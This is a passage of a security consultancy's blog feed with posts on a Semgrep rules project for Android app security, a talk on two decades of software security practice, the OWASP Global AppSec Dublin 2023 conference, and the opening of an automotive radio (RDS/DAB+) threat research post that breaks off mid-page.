<a href="https://github.com/OWASP/www-chapter-italy/blob/96201991fdfef280a67d3b41b85e7715d53115d8/assets/images/Riccardo%20Cardelli%20-%20OWASP%20Italy%20Day%202023%20-%2011th%20Sept%20PoliMi.pdf" style="margin-left: 1em; margin-right: 1em;"><img alt="OWASP Italy Day - Slides" data-original-height="1125" data-original-width="2000" height="261" src="https://blogger.googleusercontent.com/img/a/AVvXsEgSWC3_LYw1zoIE-Vn9Old6dW7lozNDxhrOUPsYOmjXvaBjZqSJCoIH0Vg9dcb1sRLW2b3i1QsH0iT8Gll7znuSzMcGoJWIAsVW_L1u9QJnxDIB6LsCcDGYxg0lrC86PeRVVtBIU905fjn2w-jAdypzz23WvJeYLIGVd5Opl_eCfILARWYwJ03GNscrXbo=w464-h261" width="464" /></a></div><br /><ul style="text-align: left;"><li><b>03 Ago 2023</b>: DevSecCon - YouTube Live</li></ul></div><div class="separator" style="clear: both; text-align: left;"> <iframe allowfullscreen="" class="BLOG_video_class" height="264" src="https://www.youtube.com/embed/ZsZMzGD9-6E" width="482" youtube-src-id="ZsZMzGD9-6E"></iframe></div><br /></div>
<script>hljs.highlightAll();</script>Riccardo Cardellihttp://www.blogger.com/profile/14631961307561551603noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-25303230349874127762023-06-21T08:04:00.017-07:002023-06-21T08:32:07.940-07:00A Cool New Project: Semgrep Rules for Android Apps Security <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiL6HespqFZ1OGFnsE4OchEw6H3FVjCY0hgeeCzdUpAqd373AeLElvHAcEFIE_lbc6KUSwkSf8ZEW65_r1Eq3R_VFVDFCjr6Boug-p-AITviNgw52nR9gnur2LjCmxaqxTbtlW6Dpb83pH6BDgmPPtaNle6fhCHldOLmYTXFsgZCmK-MTU-Yb0FDNQM72w" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img alt="Android Logo with a key like shape to introduce security." data-original-height="552" data-original-width="984" height="180" src="https://blogger.googleusercontent.com/img/a/AVvXsEiL6HespqFZ1OGFnsE4OchEw6H3FVjCY0hgeeCzdUpAqd373AeLElvHAcEFIE_lbc6KUSwkSf8ZEW65_r1Eq3R_VFVDFCjr6Boug-p-AITviNgw52nR9gnur2LjCmxaqxTbtlW6Dpb83pH6BDgmPPtaNle6fhCHldOLmYTXFsgZCmK-MTU-Yb0FDNQM72w=w320-h180" width="320" /></a></div><p>In today's digital landscape, <b>mobile application security</b> has become an <b><u>paramount concern</u></b>. </p><p>With the increasing number of threats targeting <b><i>Android</i></b> applications and the stored personal data, developers and security professionals alike are seeking robust solutions to fortify their code against potential vulnerabilities. </p><p>That's why speeding up the time and minimizing the effort in the identification of mobile security issues has become definitely important.</p><p>We are excited to introduce our <a href="https://github.com/mindedsecurity/semgrep-rules-android-security" target="_blank">new project</a>, focused on creating <a href="https://semgrep.dev/" target="_blank">Semgrep</a> rules specifically designed to enhance the security of Android apps.</p><p><b><a href="https://github.com/mindedsecurity/semgrep-rules-android-security" target="_blank">Semgrep Rules for Android Application Security</a></b></p><p>The project provides a new set of specific rules for <a href="https://owasp.org/www-project-mobile-app-security/" target="_blank">OWASP Mobile Security Testing Guide (MSTG)</a>, that will help to find security issues using <a href="https://www.gartner.com/en/information-technology/glossary/static-application-security-testing-sast" target="_blank">static code analysis (SAST)</a>.</p><h3 style="text-align: left;">The Project</h3><p>The OWASP Mobile Security Testing Guide (MSTG) is an invaluable resource for assessing the security posture of mobile applications. It provides comprehensive guidelines and best practices to identify and address potential security weaknesses. However, manually conducting these tests can be time-consuming and prone to human error. </p><p><b>This is where this project come into play. </b></p><p>By creating a set of Semgrep rules based on the OWASP Mobile Security Testing Guide, we aim to automate and streamline the security testing process for Android applications. </p><p>These rules act as a way to shift left in the SDLC of Mobile apps, enabling developers and security practitioners to efficiently identify and mitigate vulnerabilities in their code. </p><p>With Semgrep's static analysis capabilities and the knowledge base of the MSTG, we can significantly enhance the effectiveness and efficiency of mobile apps security assessments. </p><p>Our project bridges the gap between theory and practice, empowering developers to build robust and resilient Android applications while ensuring that security remains a top priority.</p><h3 style="text-align: left;">Status</h3><p>Since the beginning of the project to the present stage, we have continuously strived to deliver a solution to empower developers and security practitioners and defend against evolving threats and safeguard user data. </p><p>The actual status of our project shows where it's going to be improved and where the semgrep version limitation is a blocker to create a useful rule is<a href="https://github.com/mindedsecurity/semgrep-rules-android-security/blob/main/status.md" target="_blank"> shown here</a>, and every improvement will be updated as soon as it will be implemented.</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi5DdVzmfmrek3mjIbtKgiL0LU_K0vqZ7Z2al25enaw4OQDfpP8TZaGAzrmYSGKsZUIpWanaq6lTi77aCFFBJMucJ0gXiCxJDjYphosnLNWOPFNQoAStlEbEVgmRh5U8KoSWkVYgqQuRgyEWh8wVIM3qkgQASH7ubVUjZXaSCJuMKbeZkeGS-sHI2pFt-s" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" data-original-height="132" data-original-width="771" src="https://blogger.googleusercontent.com/img/a/AVvXsEi5DdVzmfmrek3mjIbtKgiL0LU_K0vqZ7Z2al25enaw4OQDfpP8TZaGAzrmYSGKsZUIpWanaq6lTi77aCFFBJMucJ0gXiCxJDjYphosnLNWOPFNQoAStlEbEVgmRh5U8KoSWkVYgqQuRgyEWh8wVIM3qkgQASH7ubVUjZXaSCJuMKbeZkeGS-sHI2pFt-s=s16000" /></a></div><br /><br /><p></p><p><br /></p><p><a href="https://github.com/mindedsecurity/semgrep-rules-android-security/blob/main/status.md">Check it out now!</a></p><h3 style="text-align: left;">How to contribute:</h3><p>In future posts we'll give some insight and explain how everyone can contribute to the project, in the meantime, your feedback is absolutely welcome! </p><p>We strongly believe in the power of collaboration and community involvement, hence we invite developers, security enthusiasts, and Android app experts to actively contribute to our project through our <a href="https://github.com/mindedsecurity/semgrep-rules-android-security" target="_blank">GitHub repository.</a> </p><p>By participating in the project, you can contribute new Semgrep rules, suggest improvements to existing rules, report bugs, or even share insights and ideas to enhance the overall effectiveness of our Android app security framework. </p><p>Visit our <a href="https://github.com/mindedsecurity/semgrep-rules-android-security" target="_blank">GitHub repository</a> to explore the project, engage with fellow contributors, and make a meaningful impact in the field of mobile app security. </p><h3 style="text-align: left;">Credits</h3><ul style="background-color: white; box-sizing: border-box; color: #1f2328; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 16px; margin-bottom: 0px; margin-top: 0px; padding-left: 2em; text-align: left;"><li style="box-sizing: border-box;"><b>Supervisor</b>:<br /></li><ul><li style="box-sizing: border-box;">Stefano Di Paola (Twitter: <a href="https://twitter.com/WisecWisec" target="_blank">@WisecWisec</a>)<br /><br /></li></ul><li style="box-sizing: border-box; margin-top: 0.25em;"><b>Project leader:<br /></b></li><ul><li style="box-sizing: border-box; margin-top: 0.25em;">Riccardo Cardelli (Twitter: <a href="https://twitter.com/gand3lf" target="_blank">@gand3lf</a>)<br /><br /></li></ul><li style="box-sizing: border-box; margin-top: 0.25em;"><b>Contributors</b>: <br /></li><ul><li style="box-sizing: border-box; margin-top: 0.25em;">Andrea Agnello (GitHub: <a href="https://github.com/andrenoli" target="_blank">@</a><span style="background-color: #f8f8f8; color: #1d1c1d; font-family: Arial; font-size: 15px; white-space-collapse: preserve;"><a href="https://github.com/andrenoli" target="_blank">AndreNoli</a>)</span>, </li><li style="box-sizing: border-box; margin-top: 0.25em;">Christian Cotignola (Twitter: <a href="https://twitter.com/b4dsheep" target="_blank">@b4dsheep</a>),</li><li style="box-sizing: border-box; margin-top: 0.25em;">Giacomo Zorzin (Mastodon: <a href="https://infosec.exchange/@gellge" target="_blank">@gellge</a>), </li><li style="box-sizing: border-box; margin-top: 0.25em;">Giovanni Fazi (Github: <a href="https://github.com/giovifazi" target="_blank">@giovifazi</a>), </li><li style="box-sizing: border-box; margin-top: 0.25em;">Martino Lessio (Twitter: <a href="https://twitter.com/martinolessio" target="_blank">@Martinolessio</a>), </li><li style="box-sizing: border-box; margin-top: 0.25em;">Maurizio Siddu (Github: <a href="https://github.com/akabe1" target="_blank">@akabe1</a>), </li><li style="box-sizing: border-box; margin-top: 0.25em;">Michele Di Bonaventura (Twitter: <a href="https://twitter.com/cyberaz0r" target="_blank">@cyberaz0r</a>), </li><li style="box-sizing: border-box; margin-top: 0.25em;">Michele Tumolo (Twitter: <a href="https://twitter.com/0s0urce" target="_blank">@0s0urce</a>)</li></ul></ul><p><br /></p><p><br /></p><p><br /></p><p><br /></p>Stefano Di Paolahttp://www.blogger.com/profile/11966634329749157589noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-57404185380106685912023-03-27T00:24:00.001-07:002023-04-15T08:23:43.001-07:0020 years of Software Security: threats and defense strategies evolution<p> Software security has come a long way in the past two decades. With the advent of new technologies and a rapidly evolving threat landscape, defending against cyber attacks has become more challenging than ever before. We recently presented on the evolution of software security threats and defense strategies at the <a href="https://securitysummit.it/eventi/milano-2023/sessioni/20-anni-di-software-security-l-evoluzione-delle-minacce-e-delle-difese">Security Summit in Milan on 15th March 2023</a>. In this blog post, we'll explore some of the key takeaways from the presentation.<br /><br />In the early 1990s, the Internet was still in its infancy, and most people accessed it through their workstations or personal computers. Security threats were relatively simple, and malware and viruses were typically spread through floppy disks or infected email attachments. As the Internet became more ubiquitous, so did the security threats. In the early 2000s, browser-based attacks became more common, and operating systems became a prime target for cyber criminals.<br /><br />With the rise of mobile devices in the 2010s, new security challenges emerged. Smartphones and tablets became a popular target for attackers, and the proliferation of internet-connected devices made it easier than ever for hackers to find vulnerabilities. The number of devices and users increased rapidly, creating a larger attack surface for hackers to exploit.<br /><br />Fast forward to 2020, and the Internet of things (IoT) and automotive industries are the new frontiers of software security. IoT devices such as home assistants, smart thermostats, and security cameras are often poorly secured and easily hacked. Automotive software is becoming increasingly complex, with trillions of lines of code running on modern cars. The increasing use of artificial intelligence (AI) and machine learning (ML) in software also presents new security risks.<br /><br />The timing for a successful attack has also changed dramatically over the years. In the past, attackers had to rely on users to download and execute malicious software. Today, many attacks are automated and can happen in real-time, targeting vulnerable devices as soon as they connect to the Internet.<br /><br />As software becomes more integrated into our lives, the security risks also increase. In the past, a security breach might have resulted in the loss of some data or a temporary disruption in service. Today, a security breach could have much more serious consequences, including the loss of life in the case of critical infrastructure or autonomous vehicles.<br /><br /><b>The evolution of software security approach</b> is as important as the evolution of the software security scenario itself. In the early days of software development, security was not given much importance. But as the importance of technology grew, the security risks also grew, which led to the evolution of the software security approach.</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgujYp3uktduUv1yzeNIjwAmvNrq9NZhWIclGbPQsfVtJxEcBvT58H7HvZKhEvLdy7fUJ5qJPxLGjVfoeHmxRnF2D9ooP6rGKr7TR2pTQlnUoLwBMwaCrtslQJvcXVo2A2DQbq6NYndGNlTrpt3-IJDlUVluRzvNmoRLX5kW8Y7iz0p55BmfB8ymP_W/s960/Matteo%20Meucci%20-%2020%20years%20of%20Software%20Security%20threats%20and%20defense%20strategies%20evolution%20-%20Security%20Summit%20MI%202023.pptx(2).jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="540" data-original-width="960" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgujYp3uktduUv1yzeNIjwAmvNrq9NZhWIclGbPQsfVtJxEcBvT58H7HvZKhEvLdy7fUJ5qJPxLGjVfoeHmxRnF2D9ooP6rGKr7TR2pTQlnUoLwBMwaCrtslQJvcXVo2A2DQbq6NYndGNlTrpt3-IJDlUVluRzvNmoRLX5kW8Y7iz0p55BmfB8ymP_W/w640-h360/Matteo%20Meucci%20-%2020%20years%20of%20Software%20Security%20threats%20and%20defense%20strategies%20evolution%20-%20Security%20Summit%20MI%202023.pptx(2).jpg" width="640" /></a></div><br /><p><br /><br />Let's take a look at the three stages of software security approach evolution:<br /><br /><b>See the report as a punishment:</b><br />In the early days of software development, software security was not considered a priority. Most developers focused on creating functional and feature-rich applications without thinking about the security aspects. Security audits were conducted only after the software was developed and ready for deployment. These audits were seen as a punishment, rather than a proactive measure to ensure security. This approach was ineffective and led to many security breaches.<br /><br /><b>Testing solves everything:</b><br />The second stage of software security approach evolution was the belief that testing could solve all security issues. Developers started to incorporate testing tools into the software development process to detect vulnerabilities early on. The testing tools were seen as a panacea for all security issues. While testing tools are useful in identifying vulnerabilities, they are not foolproof. </p><p><br /><b>Fixing! What is fixing? Testing is not enough?</b><br />The third and current stage of software security approach evolution is the belief that fixing vulnerabilities is crucial to ensuring software security. Developers now understand that fixing vulnerabilities is a continuous process that must be carried out throughout the software development lifecycle. Developers have now started to incorporate security measures into the design and development of software to prevent vulnerabilities from being introduced in the first place.<br /><br />Moreover, developers are now also adopting a "shift left" approach to software security, where security is integrated into the software development process from the very beginning. Developers are also relying on security tools and techniques such as threat modeling, code reviews, and penetration testing to detect and fix vulnerabilities.</p><p><br /><b>Common mistakes over the last 20 years from our experience.</b><br /><br />One of the biggest mistakes made in the last 20 years is the fault placed solely on developers for security issues. This approach is ineffective and ugly. Developers cannot be solely responsible for security issues as it requires a multi-faceted approach.<br /><br />Another common mistake is the testing methodology. Testing should be integrated into the development process, and not performed separately. If testing is conducted separately, there is a high risk of delivering software that has not been tested adequately.<br /><br />Fixing: what is fixing? Fixing is a crucial aspect of software security. The time taken to remediate security vulnerabilities is often too long. Instant security feedback is necessary in modern software projects. Security must be shared, and data about threats, defenses, vulnerabilities, and attacks must be made public to be effective.<br /><br /><b>Software security is not just one person's responsibility, but everyone's</b>. Security champions are essential in supporting developers and others. They can help to make decisions about when to engage the security team, triage security bugs, and act as the voice of security for a given product or team.<br /><br /><br />To help organizations address these challenges, the Open Worldwide Application Security Project (OWASP) has developed several frameworks, including OWASP Open SAMM and the <b><a href="https://owasp.org/www-project-software-security-5d-framework/">recently launched OWASP Software Security 5D Framework</a></b>.<br /><br />Traditionally, secure software development lifecycle (SDLC) frameworks like Microsoft SDL, BSIMM touchpoint, and OWASP SAMM have been used to assess software security. However, these frameworks lack the level of awareness, security team, security standards, and security testing tools needed to address today's challenges. </p><p><a href="https://owasp.org/www-project-software-security-5d-framework/">The OWASP Software Security 5D Framework</a><b> is designed to help companies understand the need to grow in all five dimensions simultaneously: TEAM, AWARENESS, STANDARDS, PROCESSES, and TESTING.</b></p><p> </p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDJWeOl2AGaO86c7RMhwI1avEKEt7O7ZOafptJ4kQxgSg6UfrmH-lHVVaTUmR1AbYZau6zLlNRI2DP0CZps0llvr56kdGjvzwow5vj3QMuHWv15dl7AHIGNT_eDeEbTNLyUfWaY4eOKYbI14ot2zerei35tSquQtVRpLXB--k7i18L_loW9hl8G2Ny/s960/Matteo%20Meucci%20-%2020%20years%20of%20Software%20Security%20threats%20and%20defense%20strategies%20evolution%20-%20Security%20Summit%20MI%202023.pptx.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="540" data-original-width="960" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDJWeOl2AGaO86c7RMhwI1avEKEt7O7ZOafptJ4kQxgSg6UfrmH-lHVVaTUmR1AbYZau6zLlNRI2DP0CZps0llvr56kdGjvzwow5vj3QMuHWv15dl7AHIGNT_eDeEbTNLyUfWaY4eOKYbI14ot2zerei35tSquQtVRpLXB--k7i18L_loW9hl8G2Ny/w640-h360/Matteo%20Meucci%20-%2020%20years%20of%20Software%20Security%20threats%20and%20defense%20strategies%20evolution%20-%20Security%20Summit%20MI%202023.pptx.jpg" width="640" /></a></div><br /><br /><p style="text-align: left;">The OWASP 5D framework is more practical and focuses on evaluating the maturity of a software security framework in all five dimensions simultaneously, rather than just one or two. The framework helps organizations measure their company culture on software security, enforce trust relationships between their company and clients, demonstrate improvements, and have a vision of how to manage their software security roadmap.</p><p style="text-align: left;"><br />One of the key benefits of the OWASP 5D framework is that it enables organizations to create a software security strategy that takes into account the maturity level of their outsourcers. By doing so, they can ensure that the outsourcer is implementing HTTPS, using OWASP guidelines, and conducting penetration testing as part of the software development lifecycle. Additionally, OWASP SAMM assessment and 5D framework are standards that allow organizations to assess their software security maturity level and communicate it to clients and stakeholders effectively.</p><p>In conclusion, The OWASP Software Security 5D Framework helps you to:</p><ul style="text-align: left;"><li>Measure your company culture on SwSec (not your number of vulnerabilities!)</li><li>Enforce the trust relationships between your company and your clients</li><li>Demonstrate your improvements</li><li>Have a vision of how to manage your Software Security roadmap</li></ul><p style="text-align: left;">Everyone in the organization is responsible for software security, and OWASP frameworks like the <a href="https://owasp.org/www-project-software-security-5d-framework/">Software Security 5D Framework</a> and <a href="https://owaspsamm.org/">OWASP SAMM</a> Assessment can help organizations create a software security strategy that addresses the challenges associated with software security today.</p><p style="text-align: left;">Please send an email to: <a href="mailto:SwSec5D@mindedsecurity.com">SwSec5D@mindedsecurity.com</a> to request your copy of the presentation.</p><p> <br /></p><p> </p>Matteo Meuccihttp://www.blogger.com/profile/14563434479199405929noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-72756894412498881232023-02-24T01:51:00.006-08:002023-03-05T09:50:01.307-08:00OWASP Global AppSec Dublin 2023: WorldWide and Threat Modeling<h1 style="text-align: left;"></h1><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjFLx0cRigZarMDU3cDATxMC-R7AGDiaFphYyupun9tdWOLr2-tIElV-EaI1pNQ05JDy_t87ASsYPXzZmwMCqyIZK37eHnN_QTm8OsknM6ZgEIHuY9ze8QZj9aj_jKtaR0zt2QerKquPHjcEkfwXw7rRt0RhWJBzK_LEv7efkUS10O9WRUmwOBUzv0E1Q" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img alt="" data-original-height="168" data-original-width="300" height="179" src="https://blogger.googleusercontent.com/img/a/AVvXsEjFLx0cRigZarMDU3cDATxMC-R7AGDiaFphYyupun9tdWOLr2-tIElV-EaI1pNQ05JDy_t87ASsYPXzZmwMCqyIZK37eHnN_QTm8OsknM6ZgEIHuY9ze8QZj9aj_jKtaR0zt2QerKquPHjcEkfwXw7rRt0RhWJBzK_LEv7efkUS10O9WRUmwOBUzv0E1Q" width="320" /></a></div><br />The OWASP Global AppSec Dublin 2023 conference was a truly inspiring event for anyone involved in application security. As an attendee, I was able to catch up with OWASP colleagues and hear from experts on a range of topics. <div>In particular, there were two themes that really stood out to me: <i>worldwide</i> and <i>threat modeling</i>.<br /><p></p><h4 style="text-align: left;">OWASP: The Open <u>Worldwide </u>Application Security Project</h4><div style="text-align: left;"></div><div style="text-align: left;">During the conference, the OWASP Board made an exciting announcement regarding the meaning of the letter "W" in OWASP. Traditionally, the "W" in OWASP has stood for "Web," reflecting the organization's initial focus on web application security. The Board announced they are changing the meaning of the "W" to "Worldwide," reflecting the global nature of the OWASP project and its mission.<br /><br />This change is significant because it recognizes that application security is no longer limited to just web applications. With the proliferation of mobile and IoT devices, cloud computing, and other emerging technologies, application security has become a much broader concern. By changing the meaning of the "W" to "Worldwide," OWASP is acknowledging this reality and expanding its focus to include all types of applications. </div><div style="text-align: left;"> </div><div style="text-align: left;">The change in the meaning of the "W" in OWASP from "Web" to "Worldwide" is a significant development for the organization and the application security community as a whole. It reflects the evolving nature of application security and the importance of the global community in addressing these challenges. I am excited to see how this change will shape the future of OWASP and its mission to make software security visible worldwide.<br /></div><h4 style="text-align: left;"></h4><h4 style="text-align: left;">Threat Modeling</h4><div style="text-align: left;"></div><p>Threat modeling is a structured approach for identifying, quantifying, and addressing the security risks associated with an application. In recent years, there has been a growing interest in this area, and the conference featured a keynote and two talks on the subject.</p>The conference had a keynote, a training session and 2 talks regarding threat modeling. The keynote, “A Taste of Privacy Threat Modeling” by Kim Wuyts, focused on threat modeling privacy. Ms. Wuyts spoke about how to identify potential privacy threats and how to mitigate those risks. She also provided insights into best practices for threat modeling in a privacy context. <div style="text-align: left;"> </div><div style="text-align: left;">Other talks at the event emphasized practical approaches on Threat Modeling that are essential for companies to adopt in order to develop more secure products and services. These presentations provided valuable insights and actionable recommendations that can help organizations improving their security posture and better protect their customers' data and privacy.<br /><br />Threat modeling is not a new concept. In fact, it has been around for quite some time. However, it has only recently gained traction within the application security community. This is likely due to the increasing number of data breaches and cyber attacks that have occurred in recent years. Organizations are now more aware than ever of the need to secure their applications against potential threats.</div><div style="text-align: left;"> </div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;">Since the inception of our company in 2007, we have been advocating for the promotion of Threat Modeling activities. However, it was only in recent years that we have observed a significant increase in interest in this area. The growing discourse around Threat Modeling indicates a broader recognition of its importance in ensuring the security of software and systems.<br /><br /><div style="text-align: left;"></div><div style="text-align: left;">More information about threat modeling:</div><div style="text-align: left;"> </div><div style="text-align: left;">- Adam Shostack: <a href="https://shostack.org/books/threat-modeling-book">"Threat Modeling: designing for security"</a><br />- Marco Morana:<a href="https://www.wiley.com/en-us/Risk+Centric+Threat+Modeling%3A+Process+for+Attack+Simulation+and+Threat+Analysis-p-9780470500965"> "Risk Centric Threat Modeling"</a><br />- <a href="https://www.microsoft.com/en-us/securityengineering/sdl/threatmodeling">Microsoft TM</a> <br />- <a href="https://mindedsecurity.com/services/consulting/threat-modeling/">IMQ Minded Security Threat Modeling</a></div><div style="text-align: left;"> </div><div style="text-align: left;"><h4 style="text-align: left;">Testability patterns for web applications, a new OWASP Project</h4><div><div><a href="https://testable.eu/" target="_blank">TESTABLE</a> is an EU-funded project under the Horizon 2020 Research and Innovation Actions program, designed to address the significant challenge of building and maintaining secure and privacy-</div><div>friendly modern web-based and AI-powered application software systems.</div><div><br /></div><div>IMQ Minded Security is part of the <a href="https://testable.eu/consortium/" target="_blank">TESTABLE consortium</a> together with CISPA, Eurecom, TUBS, UC3M, SAP SE, ShiftLeft GmbH, NortonLifeLock and Pluribus One.</div><div><br /></div><div>We would like to express our appreciation to Luca Compagna, Senior Scientist and Research Architect at SAP Security Research, for his insightful presentation on a new OWASP project aimed at making our Testability Patterns for Web Applications accessible and improvable by the wider community.</div></div><div style="text-align: left;"><br />During the presentation, Luca emphasized the critical role of testability in ensuring the security and privacy of Web Applications, and demonstrated our approach in the context of Static Application Security Testing (SAST). Specifically, we provided concrete examples of SAST testability patterns and how they can hinder the analysis of web application code by state-of-the-art SAST tools.<br /><br />He also showcased our open source framework for implementing these patterns, which enables the evaluation of SAST tools against the testability patterns, highlighting which patterns pose problems for specific tools. Additionally, the framework enables the identification of testability patterns within the source code of web applications, informing developers of areas that may prove challenging for SAST.<br /><br />Towards the end of the presentation, he introduced the three main target audience groups: web developers, SAST tool developers, and security central teams. For each group, we highlighted the value-added by these SAST patterns and provided guidance on how they can participate in our project community and contribute to the creation and maturation of testability patterns. Finally, we presented our plan for the OWASP project.<br /><br /></div><div style="text-align: left;">More information regarding testable:</div></div><div style="text-align: left;"> </div><div style="text-align: left;">- <a href="https://testable.eu/ ">Testable site</a></div><div style="text-align: left;">- <a href="https://owasp.org/www-project-testability-patterns-for-web-applications/">OWASP Testability Patterns for Web Applications </a></div><div style="text-align: left;"> </div><div style="text-align: left;">You can see all the Conference's video <a href="https://www.youtube.com/playlist?list=PLpr-xdpM8wG8479ud_l4W93WU5MP2bg78">here</a>. <br /></div></div><p><br /></p></div>Matteo Meuccihttp://www.blogger.com/profile/14563434479199405929noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-41295196448562362392022-07-28T08:02:00.002-07:002022-07-28T08:03:01.997-07:00UN ECE 155 Threats in the real world: Wireless Networking Attacks and Mitigations. A case study<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiudD_Xp3lJCAzIrQrT-FSjXcxXuz72qLmrLHvFKhQhJzoSnmy-gWoWrCt-FNmbbFiylX3byUeWjZuJk7XE41wIFarc3fREroKYz7qMjXC4-l1BQJYbnvSpIUX-5LzdviiunBR1TrfDHRt-qKBvgpJNAHV8KOsUeDJM3M1Me3_ySBLstqadk8_JwyZk" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img alt="" data-original-height="271" data-original-width="440" height="197" src="https://blogger.googleusercontent.com/img/a/AVvXsEiudD_Xp3lJCAzIrQrT-FSjXcxXuz72qLmrLHvFKhQhJzoSnmy-gWoWrCt-FNmbbFiylX3byUeWjZuJk7XE41wIFarc3fREroKYz7qMjXC4-l1BQJYbnvSpIUX-5LzdviiunBR1TrfDHRt-qKBvgpJNAHV8KOsUeDJM3M1Me3_ySBLstqadk8_JwyZk" width="320" /></a></div><br />On March the 31st, I gave a <a href="https://italy.vehiclemeetings.com/index.php/conference/program/program-day-2.html" target="_blank">quick talk </a>on automotive security at <a href="https://italy.vehiclemeetings.com/index.php" target="_blank">VTM</a> titled "<b>UN ECE 155 Threats in the real world: Wireless Networking Attacks and Mitigations. A case study</b>" (<a href="https://mindedsecurity.com/wp-content/uploads/2022/07/DIPAOLA_IMQ_VTM_2022.pdf" target="_blank">slides here</a>).<p></p><p>The idea was to create some content about one of the <i>most hyped topics</i> in the automotive cyber security world over the last year, without keeping it just theoretical;</p><p><a href="https://unece.org/transport/documents/2021/03/standards/un-regulation-no-155-cyber-security-and-cyber-security" target="_blank">UN/ECE 155 </a>and <a href="https://www.iso.org/standard/70918.html" target="_blank">ISO/SAE 21434</a> whose concerns are about the implementation of a CSMS (Cyber Security Management System) which consists in performing, for each vehicle, several high level security tasks, such as Threat Analysis and Risk Assessment (TARA), supply chain security issues tracking, implementation of the mitigations, update management and so on.</p><p>The following schema shows the product development lifecycle model, called <a href="https://en.wikipedia.org/wiki/V-Model">V-Model</a>, used in the automotive industry and the cybersecurity processes in each phase of the V-Model.</p><p style="text-align: center;"> <img height="249" src="https://lh4.googleusercontent.com/1w47GbhM6KsZeduLejmcHjwimwwNm3cslMo_SDs8cpY3kdkBVpL-r4xQuYk3fTk84PKFWbNoTAig6OzboYlmaO1pPkmeiPekS7eqAA5bwWqluk0Y7bwmAR0VA8K_bqkeqiy6wINWAFjMSMOCy1qZIw=w400-h249" width="400" /></p><p style="text-align: left;">The most interesting point that can help mitigating the risks and performing attack surface analysis is the TARA which can really help to minimize the risk in the earliest stage. In particular it will give its best, well when the technologies that are going to be implemented, <i>are well known from a security perspective</i>. </p><p style="text-align: left;">The following figure describes the steps that must be covered to perform a TARA by the ISO 21434:</p><p style="text-align: center;"><span id="docs-internal-guid-ccc7537f-7fff-0fad-52ed-b7e0b6c3584c"><img height="333px;" src="https://lh4.googleusercontent.com/gPxH7kj3KglNrhtMJPwjz7c-9ea3SLTvap2NZHGedi_1_8FDwnnskmdnxK7k6DAvVwz71BHcdGun8RwfQ4XDs3UkJivTRyDwtjSv0HIP012-dexgowspCOIz36rbCfwOs4gb_ZZDIzlRqBo0RxxZlQ" width="376px;" /></span></p><p style="text-align: left;"><br /></p><p style="text-align: left;">Since the audience was expected to be mixed technical/non technical I decided to keep it in the middle as well, which, alas, sometimes means the hard way.</p><p>Also<i>,</i> how to go practical without going vehicle specific? mmm, take something that is already on every vehicle and talk about attacks, risks and remediations in the context of UNECE R155 and ISO 21434 requirements.</p><h3 style="text-align: left;"><u><b>Digital Radio Broadcasting!</b></u> </h3><p>Now, the problem is to research on those topics without being too obvious and condense all in a limited span of 30 minutes which is quite challenging.</p><p>With the goal of identifying some unexplored attack surface, I took a couple of weeks to go into <a href="http://www.interactive-radio-system.com/docs/EN50067_RDS_Standard.pdf" target="_blank">RDS</a> and <a href="https://www.worlddab.org/dab/technical-specifications">DAB+</a> specifications and <a href="https://www.blackhat.com/presentations/bh-usa-07/Barisani_and_Bianco/Presentation/bh-usa-07-barisani_and_bianco.pdf" target="_blank">their</a> <a href="https://www.bastibl.net/rds-tmc/" target="_blank">previous</a> <a href="https://troopers.de/media/filer_public/18/4f/184fa903-3610-4647-9cb0-bb7644d3f295/broadcasting_your_attack_security_testing_dab_radio_in_cars.pdf" target="_blank">research</a> in the security context. </p><p>As briefly described in the slides in IMQ Minded Security I created a lab testbed with:</p><p></p><ul style="text-align: left;"><li>A <b>RDS transmitter </b>using Raspberry PI and this <a href="https://github.com/ChristopheJacquet/PiFmRds" target="_blank">wonderful piece of software</a></li><li>Several non automotive <b>RDS receivers</b> and their software and a Renault Scenic 2015 Head Unit with RDS support.</li><li>A <b>DAB+ transmitter</b> using <i>HackRF One</i>, and this essential <a href="https://www.opendigitalradio.org/mmbtools" target="_blank">set of software</a> together with this very useful <a href="https://medium.com/@sundayglee/digital-radio-transmission-using-limesdr-and-odr-part-1-b1bcb274d23c " target="_blank">tutorial</a>. </li><li>A <i>RTL-SDR</i> for local tests and a <b>DAB+ USB Dongle receiver</b> that is also used in the automotive world with the most used <i>Android Automotive OS</i> software <a href="https://play.google.com/store/apps/details?id=com.zoulou.dab&hl=it&gl=US">DAB-Z</a> and several other applications that are mostly used in desktop environments. Alas, apart from DAB-Z we had no immediately available automotive head units supporting DAB+ :/.</li></ul><div>The threats were identified after reading the whole RDS and DAB+ documentation and condensed for the talk.</div><div><p>The most interesting turned out to be DAB+ which has much more <a href="https://www.worlddab.org/dab/technical-specifications">perimeter</a>.</p><p style="text-align: center;"><a 